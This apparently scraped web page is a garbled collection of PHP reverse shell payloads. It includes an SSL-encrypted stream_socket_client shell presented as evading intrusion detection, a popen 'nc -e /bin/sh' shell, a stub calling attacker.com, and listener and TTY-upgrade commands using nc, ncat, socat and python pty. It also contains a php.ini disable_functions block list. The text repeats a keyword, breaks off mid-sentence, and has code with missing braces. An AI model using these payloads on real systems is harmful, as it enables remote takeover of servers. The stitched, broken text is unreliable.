Reverse Shell Php Top Direct

$ip = getenv('ATTACKER_IP');
$port = getenv('ATTACKER_PORT');

On your attacking machine (Kali Linux or any VPS), you need a listener.

nc -lvnp 4444

---

In php.ini, modify the disable_functions directive:

disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,fsockopen,pfsockopen,stream_socket_client

Note: This breaks legitimate apps (e.g., WordPress updates). Test in staging first.

Plaintext traffic is easily detected by IDS/IPS (Snort rules looking for bash -i or id;). An SSL-encrypted shell looks like regular HTTPS traffic. reverse shell php top

Requirements: OpenSSL extension enabled on the victim.

Attacker Prep:

# Generate a self-signed cert
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Start SSL listener
ncat --ssl --ssl-cert cert.pem --ssl-key key.pem -lvnp 443

PHP Payload:

<?php
$context = stream_context_create(['ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$sock = stream_socket_client('ssl://YOUR_IP:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
if ($sock) 
    while ($cmd = fread($sock, 2048)) 
        $output = shell_exec(trim($cmd) . " 2>&1");
        fwrite($sock, $output . "\n# ");
fclose($sock);
?>

Rating: 9/10 for evasion.

The simple script might not work on all systems due to differences in the nc command or its location. A more universally compatible version can be:

<?php
$ip = 'your_attacker_ip_address'; // Change this to your IP
$port = 4444;
$p = popen("nc $ip $port -e /bin/sh", "w");
if (!$p) 
    die("Failed to create process");
?>

Attacker machine (Linux):

nc -lvnp 4444

Or for a more stable TTY:

rlwrap nc -lvnp 4444

Or use socat:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Once connected, upgrade to fully interactive shell: On your attacking machine (Kali Linux or any

python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
script /dev/null -c bash

---

A reverse shell flips the script. The victim server initiates the connection outbound to the attacker’s machine.

Using stream_socket_client() with SSL:

$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);